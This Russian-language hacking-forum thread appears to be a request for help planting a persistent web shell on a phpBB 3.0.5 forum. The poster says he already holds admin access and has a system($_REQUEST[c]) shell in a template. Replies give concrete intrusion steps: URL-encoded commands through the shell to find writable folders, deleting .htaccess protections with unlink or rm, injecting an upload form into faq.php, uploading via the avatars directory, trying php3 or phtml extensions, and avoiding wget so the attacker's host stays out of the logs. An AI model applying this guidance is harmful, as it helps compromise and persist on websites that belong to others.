Помогите с phpBB 3.0.5

Discussion in 'Песочница' started by BloodKicker, 14 Aug 2009.

  1. BloodKicker

    BloodKicker New Member

    Joined:
    26 Nov 2008
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Кто может расписать как залить шелл на форум phpBB версии 3,0,5. директория chache и store под .httaccses
     
  2. Stinside

    Stinside Member

    Joined:
    1 May 2009
    Messages:
    44
    Likes Received:
    42
    Reputations:
    5
    Не думаю, что кто-то возьмется за это.
    Это же звездец мне кажется геморрой.
     
  3. BloodKicker

    BloodKicker New Member

    Joined:
    26 Nov 2008
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Шелл есть в темплейтах
    system($_REQUEST[c])
    просто я не знаю куда еще шелл залить.
    ПС доступ к админке пока тоже есть
     
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    сделай такой запрос - покажет все возможные папки на запись:

    &c=system('cd ../; find . -perm -2 -type d -ls');

    тьфу, у тебя там уже систем, тогда так:

    ?c=cd%20../;%20find%20.%20-perm%20-2%20-type%20d%20-ls
     
    #4 Pashkela, 15 Aug 2009
    Last edited: 15 Aug 2009
  5. BloodKicker

    BloodKicker New Member

    Joined:
    26 Nov 2008
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    я уже делал но эта злая собака .httaccses мешается( везде
     
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    т.е. во всех папках с правами на запись есть .htaccess, запрещающий выполнение php-кода?

    хз, можно попробовать отредактировать файлы в корне форума, откуда уж php точно выполняется. Если прав хватит. Просто вставить форму загрузки например в faq.php посредством определенного php-кода через твой шелл в темплейте. Опять же если правов хватает
     
    #6 Pashkela, 16 Aug 2009
    Last edited: 16 Aug 2009
  7. BloodKicker

    BloodKicker New Member

    Joined:
    26 Nov 2008
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    а можно подробней, как же отредактировать тот же faq.php через шелл? Если такое возможно то может просто через запрос удалить аксес, а дальше по средствам wget'а заливать шелл
     
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ну дык и удаляй .htaccess, чо ты думаешь

    unlink('/абсолютный_путь_до_папки/.htaccess'); - через php
    rm /абсолютный_путь_до_папки/.htaccess - через system

    опять же если хватит прав
     
  9. BloodKicker

    BloodKicker New Member

    Joined:
    26 Nov 2008
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    непрактило, может еще есть способы залить в эту сраку шелл?
    И проверьте правильно ли я вообще запрос wget'a кидаю
     
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    причем здесь кеш вообще? А что, папку с авами отменили? Зайди на любую тему в форуме и посмотри свойства авы любого участника - туда и лей, и никаких вгетов, для начала хоть phpinfo.php туда запиши. А то шелл не залил еще, а свой сайт с шеллом уже в логах оставил
     
  11. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    ТС, попробуй залить с расширением php3 или, скажем phtml
     
  12. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    Есть сейчас способы заливки шелла в эту версию форума? есть доступ к админке. Подскажите пожалуйста
     
  13. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    194
    Likes Received:
    5
    Reputations:
    0
    ТС обьясни как получил доступ к админке.ПЛЗ!!!